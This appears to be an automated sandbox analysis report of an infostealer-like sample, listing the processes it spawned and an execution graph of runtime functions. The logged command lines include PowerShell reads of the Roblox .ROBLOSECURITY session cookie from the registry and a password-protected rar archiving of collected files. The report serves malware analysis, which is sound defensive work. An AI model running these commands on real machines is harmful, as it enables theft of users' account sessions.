                                                                                                                                                                                                                                              Start time:02:37:41
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:96
                                                                                                                                                                                                                                              Start time:02:37:41
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:97
                                                                                                                                                                                                                                              Start time:02:37:41
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff733b70000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:98
                                                                                                                                                                                                                                              Start time:02:37:43
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:99
                                                                                                                                                                                                                                              Start time:02:37:43
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:100
                                                                                                                                                                                                                                              Start time:02:37:43
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:101
                                                                                                                                                                                                                                              Start time:02:37:44
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:102
                                                                                                                                                                                                                                              Start time:02:37:44
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:103
                                                                                                                                                                                                                                              Start time:02:37:44
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:108
                                                                                                                                                                                                                                              Start time:02:37:53
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:109
                                                                                                                                                                                                                                              Start time:02:37:53
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:110
                                                                                                                                                                                                                                              Start time:02:37:54
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *
                                                                                                                                                                                                                                              Imagebase:0x7ff60e5c0000
                                                                                                                                                                                                                                              File size:630'736 bytes
                                                                                                                                                                                                                                              MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:112
                                                                                                                                                                                                                                              Start time:02:37:57
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:113
                                                                                                                                                                                                                                              Start time:02:37:57
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:128
                                                                                                                                                                                                                                              Start time:02:37:57
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:133
                                                                                                                                                                                                                                              Start time:02:37:58
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:9.5%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:19.6%
                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                Total number of Limit Nodes:71
                                                                                                                                                                                                                                                execution_graph 20369 7ff7c71bcbc0 20370 7ff7c71bcbd0 20369->20370 20386 7ff7c71c9c18 20370->20386 20372 7ff7c71bcbdc 20392 7ff7c71bceb8 20372->20392 20374 7ff7c71bd19c 7 API calls 20376 7ff7c71bcc75 20374->20376 20375 7ff7c71bcbf4 _RTC_Initialize 20384 7ff7c71bcc49 20375->20384 20397 7ff7c71bd068 20375->20397 20378 7ff7c71bcc09 20400 7ff7c71c9084 20378->20400 20384->20374 20385 7ff7c71bcc65 20384->20385 20387 7ff7c71c9c29 20386->20387 20388 7ff7c71c9c31 20387->20388 20389 7ff7c71c4f78 _get_daylight 11 API calls 20387->20389 20388->20372 20390 7ff7c71c9c40 20389->20390 20391 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 20390->20391 20391->20388 20393 7ff7c71bcec9 20392->20393 20396 7ff7c71bcece __scrt_acquire_startup_lock 20392->20396 20394 7ff7c71bd19c 7 API calls 20393->20394 20393->20396 20395 7ff7c71bcf42 20394->20395 20396->20375 20425 7ff7c71bd02c 20397->20425 20399 7ff7c71bd071 20399->20378 20401 7ff7c71bcc15 20400->20401 20402 7ff7c71c90a4 20400->20402 20401->20384 20424 7ff7c71bd13c InitializeSListHead 20401->20424 20403 7ff7c71c90c2 GetModuleFileNameW 20402->20403 20404 7ff7c71c90ac 20402->20404 20408 7ff7c71c90ed 20403->20408 20405 7ff7c71c4f78 _get_daylight 11 API calls 20404->20405 20406 7ff7c71c90b1 20405->20406 20407 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 20406->20407 20407->20401 20409 7ff7c71c9024 11 API calls 20408->20409 20410 7ff7c71c912d 20409->20410 20411 7ff7c71c9135 20410->20411 20415 7ff7c71c914d 20410->20415 20412 7ff7c71c4f78 _get_daylight 11 API calls 20411->20412 20413 7ff7c71c913a 20412->20413 20414 7ff7c71ca9b8 __free_lconv_mon 11 API calls 20413->20414 20414->20401 20416 7ff7c71c916f 20415->20416 20418 7ff7c71c91b4 20415->20418 20419 7ff7c71c919b 20415->20419 20417 7ff7c71ca9b8 __free_lconv_mon 11 API calls 20416->20417 20417->20401 20422 7ff7c71ca9b8 __free_lconv_mon 11 API calls 20418->20422 20420 7ff7c71ca9b8 __free_lconv_mon 11 API calls 20419->20420 20421 7ff7c71c91a4 20420->20421 20423 7ff7c71ca9b8 __free_lconv_mon 11 API calls 20421->20423 20422->20416 20423->20401 20426 7ff7c71bd046 20425->20426 20428 7ff7c71bd03f 20425->20428 20429 7ff7c71ca25c 20426->20429 20428->20399 20432 7ff7c71c9e98 20429->20432 20439 7ff7c71d0348 EnterCriticalSection 20432->20439 19512 7ff7c71cb040 19513 7ff7c71cb045 19512->19513 19517 7ff7c71cb05a 19512->19517 19518 7ff7c71cb060 19513->19518 19519 7ff7c71cb0a2 19518->19519 19520 7ff7c71cb0aa 19518->19520 19521 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19519->19521 19522 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19520->19522 19521->19520 19523 7ff7c71cb0b7 19522->19523 19524 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19523->19524 19525 7ff7c71cb0c4 19524->19525 19526 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19525->19526 19527 7ff7c71cb0d1 19526->19527 19528 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19527->19528 19529 7ff7c71cb0de 19528->19529 19530 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19529->19530 19531 7ff7c71cb0eb 19530->19531 19532 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19531->19532 19533 7ff7c71cb0f8 19532->19533 19534 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19533->19534 19535 7ff7c71cb105 19534->19535 19536 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19535->19536 19537 7ff7c71cb115 19536->19537 19538 7ff7c71ca9b8 __free_lconv_mon 11 API calls 19537->19538 19539 7ff7c71cb125 19538->19539 19544 7ff7c71caf04 19539->19544 19558 7ff7c71d0348 EnterCriticalSection 19544->19558 20440 7ff7c71c9dc0 20443 7ff7c71c9d3c 20440->20443 20450 7ff7c71d0348 EnterCriticalSection 20443->20450 16409 7ff7c71d0938 16410 7ff7c71d095c 16409->16410 16412 7ff7c71d096c 16409->16412 16411 7ff7c71c4f78 _get_daylight 11 API calls 16410->16411 16431 7ff7c71d0961 16411->16431 16413 7ff7c71d0c4c 16412->16413 16414 7ff7c71d098e 16412->16414 16415 7ff7c71c4f78 _get_daylight 11 API calls 16413->16415 16416 7ff7c71d09af 16414->16416 16558 7ff7c71d0ff4 16414->16558 16417 7ff7c71d0c51 16415->16417 16420 7ff7c71d0a21 16416->16420 16422 7ff7c71d09d5 16416->16422 16427 7ff7c71d0a15 16416->16427 16419 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16417->16419 16419->16431 16424 7ff7c71cec08 _get_daylight 11 API calls 16420->16424 16441 7ff7c71d09e4 16420->16441 16421 7ff7c71d0ace 16430 7ff7c71d0aeb 16421->16430 16438 7ff7c71d0b3d 16421->16438 16573 7ff7c71c9730 16422->16573 16428 7ff7c71d0a37 16424->16428 16426 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16426->16431 16427->16421 16427->16441 16579 7ff7c71d719c 16427->16579 16432 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16428->16432 16435 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16430->16435 16436 7ff7c71d0a45 16432->16436 16433 7ff7c71d09df 16437 7ff7c71c4f78 _get_daylight 11 API calls 16433->16437 16434 7ff7c71d09fd 16434->16427 16440 7ff7c71d0ff4 45 API calls 16434->16440 16439 7ff7c71d0af4 16435->16439 16436->16427 16436->16441 16444 7ff7c71cec08 _get_daylight 11 API calls 16436->16444 16437->16441 16438->16441 16442 7ff7c71d344c 40 API calls 16438->16442 16451 7ff7c71d0af9 16439->16451 16615 7ff7c71d344c 16439->16615 16440->16427 16441->16426 16443 7ff7c71d0b7a 16442->16443 16445 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16443->16445 16447 7ff7c71d0a67 16444->16447 16449 7ff7c71d0b84 16445->16449 16448 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16447->16448 16448->16427 16449->16441 16449->16451 16450 7ff7c71d0c40 16453 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16450->16453 16451->16450 16455 7ff7c71cec08 _get_daylight 11 API calls 16451->16455 16452 7ff7c71d0b25 16454 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16452->16454 16453->16431 16454->16451 16456 7ff7c71d0bc8 16455->16456 16457 7ff7c71d0bd0 16456->16457 16458 7ff7c71d0bd9 16456->16458 16460 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16457->16460 16540 7ff7c71ca514 16458->16540 16462 7ff7c71d0bd7 16460->16462 16467 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16462->16467 16463 7ff7c71d0bf0 16624 7ff7c71d72b4 16463->16624 16464 7ff7c71d0c7b 16466 7ff7c71ca970 _isindst 17 API calls 16464->16466 16469 7ff7c71d0c8f 16466->16469 16467->16431 16472 7ff7c71d0cb8 16469->16472 16478 7ff7c71d0cc8 16469->16478 16470 7ff7c71d0c17 16473 7ff7c71c4f78 _get_daylight 11 API calls 16470->16473 16471 7ff7c71d0c38 16475 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16471->16475 16474 7ff7c71c4f78 _get_daylight 11 API calls 16472->16474 16476 7ff7c71d0c1c 16473->16476 16477 7ff7c71d0cbd 16474->16477 16475->16450 16480 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16476->16480 16479 7ff7c71d0fab 16478->16479 16481 7ff7c71d0cea 16478->16481 16482 7ff7c71c4f78 _get_daylight 11 API calls 16479->16482 16480->16462 16483 7ff7c71d0d07 16481->16483 16643 7ff7c71d10dc 16481->16643 16484 7ff7c71d0fb0 16482->16484 16487 7ff7c71d0d7b 16483->16487 16489 7ff7c71d0d2f 16483->16489 16495 7ff7c71d0d6f 16483->16495 16486 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16484->16486 16486->16477 16491 7ff7c71d0da3 16487->16491 16496 7ff7c71cec08 _get_daylight 11 API calls 16487->16496 16510 7ff7c71d0d3e 16487->16510 16488 7ff7c71d0e2e 16498 7ff7c71d0e4b 16488->16498 16507 7ff7c71d0e9e 16488->16507 16658 7ff7c71c976c 16489->16658 16493 7ff7c71cec08 _get_daylight 11 API calls 16491->16493 16491->16495 16491->16510 16499 7ff7c71d0dc5 16493->16499 16494 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16494->16477 16495->16488 16495->16510 16664 7ff7c71d705c 16495->16664 16500 7ff7c71d0d95 16496->16500 16503 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16498->16503 16504 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16499->16504 16505 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16500->16505 16501 7ff7c71d0d57 16501->16495 16509 7ff7c71d10dc 45 API calls 16501->16509 16502 7ff7c71d0d39 16506 7ff7c71c4f78 _get_daylight 11 API calls 16502->16506 16508 7ff7c71d0e54 16503->16508 16504->16495 16505->16491 16506->16510 16507->16510 16511 7ff7c71d344c 40 API calls 16507->16511 16514 7ff7c71d344c 40 API calls 16508->16514 16517 7ff7c71d0e5a 16508->16517 16509->16495 16510->16494 16512 7ff7c71d0edc 16511->16512 16513 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16512->16513 16515 7ff7c71d0ee6 16513->16515 16518 7ff7c71d0e86 16514->16518 16515->16510 16515->16517 16516 7ff7c71d0f9f 16519 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16516->16519 16517->16516 16521 7ff7c71cec08 _get_daylight 11 API calls 16517->16521 16520 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16518->16520 16519->16477 16520->16517 16522 7ff7c71d0f2b 16521->16522 16523 7ff7c71d0f33 16522->16523 16524 7ff7c71d0f3c 16522->16524 16525 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16523->16525 16549 7ff7c71d04e4 16524->16549 16528 7ff7c71d0f3a 16525->16528 16534 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16528->16534 16529 7ff7c71d0fdf 16533 7ff7c71ca970 _isindst 17 API calls 16529->16533 16530 7ff7c71d0f52 SetEnvironmentVariableW 16531 7ff7c71d0f76 16530->16531 16532 7ff7c71d0f97 16530->16532 16535 7ff7c71c4f78 _get_daylight 11 API calls 16531->16535 16537 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16532->16537 16536 7ff7c71d0ff3 16533->16536 16534->16477 16538 7ff7c71d0f7b 16535->16538 16537->16516 16539 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16538->16539 16539->16528 16541 7ff7c71ca521 16540->16541 16542 7ff7c71ca52b 16540->16542 16541->16542 16547 7ff7c71ca546 16541->16547 16543 7ff7c71c4f78 _get_daylight 11 API calls 16542->16543 16544 7ff7c71ca532 16543->16544 16546 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16544->16546 16545 7ff7c71ca53e 16545->16463 16545->16464 16546->16545 16547->16545 16548 7ff7c71c4f78 _get_daylight 11 API calls 16547->16548 16548->16544 16550 7ff7c71d04f1 16549->16550 16552 7ff7c71d04fb 16549->16552 16550->16552 16556 7ff7c71d0517 16550->16556 16551 7ff7c71c4f78 _get_daylight 11 API calls 16553 7ff7c71d0503 16551->16553 16552->16551 16554 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16553->16554 16555 7ff7c71d050f 16554->16555 16555->16529 16555->16530 16556->16555 16557 7ff7c71c4f78 _get_daylight 11 API calls 16556->16557 16557->16553 16559 7ff7c71d1029 16558->16559 16566 7ff7c71d1011 16558->16566 16560 7ff7c71cec08 _get_daylight 11 API calls 16559->16560 16569 7ff7c71d104d 16560->16569 16561 7ff7c71d10d2 16563 7ff7c71ca574 __CxxCallCatchBlock 45 API calls 16561->16563 16562 7ff7c71d10ae 16565 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16562->16565 16564 7ff7c71d10d8 16563->16564 16565->16566 16566->16416 16567 7ff7c71cec08 _get_daylight 11 API calls 16567->16569 16568 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16568->16569 16569->16561 16569->16562 16569->16567 16569->16568 16570 7ff7c71ca514 __std_exception_copy 37 API calls 16569->16570 16571 7ff7c71d10bd 16569->16571 16570->16569 16572 7ff7c71ca970 _isindst 17 API calls 16571->16572 16572->16561 16574 7ff7c71c9740 16573->16574 16578 7ff7c71c9749 16573->16578 16574->16578 16688 7ff7c71c9208 16574->16688 16578->16433 16578->16434 16580 7ff7c71d62c4 16579->16580 16581 7ff7c71d71a9 16579->16581 16582 7ff7c71d62d1 16580->16582 16587 7ff7c71d6307 16580->16587 16583 7ff7c71c4fbc 45 API calls 16581->16583 16586 7ff7c71c4f78 _get_daylight 11 API calls 16582->16586 16588 7ff7c71d6278 16582->16588 16585 7ff7c71d71dd 16583->16585 16584 7ff7c71d6331 16589 7ff7c71c4f78 _get_daylight 11 API calls 16584->16589 16594 7ff7c71d71f3 16585->16594 16597 7ff7c71d720a 16585->16597 16608 7ff7c71d71e2 16585->16608 16590 7ff7c71d62db 16586->16590 16587->16584 16592 7ff7c71d6356 16587->16592 16588->16427 16593 7ff7c71d6336 16589->16593 16591 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16590->16591 16595 7ff7c71d62e6 16591->16595 16600 7ff7c71c4fbc 45 API calls 16592->16600 16604 7ff7c71d6341 16592->16604 16596 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16593->16596 16598 7ff7c71c4f78 _get_daylight 11 API calls 16594->16598 16595->16427 16596->16604 16601 7ff7c71d7214 16597->16601 16602 7ff7c71d7226 16597->16602 16599 7ff7c71d71f8 16598->16599 16603 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16599->16603 16600->16604 16605 7ff7c71c4f78 _get_daylight 11 API calls 16601->16605 16606 7ff7c71d724e 16602->16606 16607 7ff7c71d7237 16602->16607 16603->16608 16604->16427 16609 7ff7c71d7219 16605->16609 16951 7ff7c71d8fbc 16606->16951 16942 7ff7c71d6314 16607->16942 16608->16427 16612 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16609->16612 16612->16608 16614 7ff7c71c4f78 _get_daylight 11 API calls 16614->16608 16616 7ff7c71d348b 16615->16616 16617 7ff7c71d346e 16615->16617 16619 7ff7c71d3495 16616->16619 16991 7ff7c71d7ca8 16616->16991 16617->16616 16618 7ff7c71d347c 16617->16618 16620 7ff7c71c4f78 _get_daylight 11 API calls 16618->16620 16998 7ff7c71d7ce4 16619->16998 16623 7ff7c71d3481 __scrt_get_show_window_mode 16620->16623 16623->16452 16625 7ff7c71c4fbc 45 API calls 16624->16625 16626 7ff7c71d731a 16625->16626 16627 7ff7c71d7328 16626->16627 17010 7ff7c71cef94 16626->17010 17013 7ff7c71c551c 16627->17013 16631 7ff7c71d7414 16634 7ff7c71d7425 16631->16634 16635 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16631->16635 16632 7ff7c71c4fbc 45 API calls 16633 7ff7c71d7397 16632->16633 16637 7ff7c71cef94 5 API calls 16633->16637 16640 7ff7c71d73a0 16633->16640 16636 7ff7c71d0c13 16634->16636 16638 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16634->16638 16635->16634 16636->16470 16636->16471 16637->16640 16638->16636 16639 7ff7c71c551c 14 API calls 16641 7ff7c71d73fb 16639->16641 16640->16639 16641->16631 16642 7ff7c71d7403 SetEnvironmentVariableW 16641->16642 16642->16631 16644 7ff7c71d10ff 16643->16644 16645 7ff7c71d111c 16643->16645 16644->16483 16646 7ff7c71cec08 _get_daylight 11 API calls 16645->16646 16651 7ff7c71d1140 16646->16651 16647 7ff7c71d11a1 16649 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16647->16649 16648 7ff7c71ca574 __CxxCallCatchBlock 45 API calls 16650 7ff7c71d11ca 16648->16650 16649->16644 16651->16647 16652 7ff7c71cec08 _get_daylight 11 API calls 16651->16652 16653 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16651->16653 16654 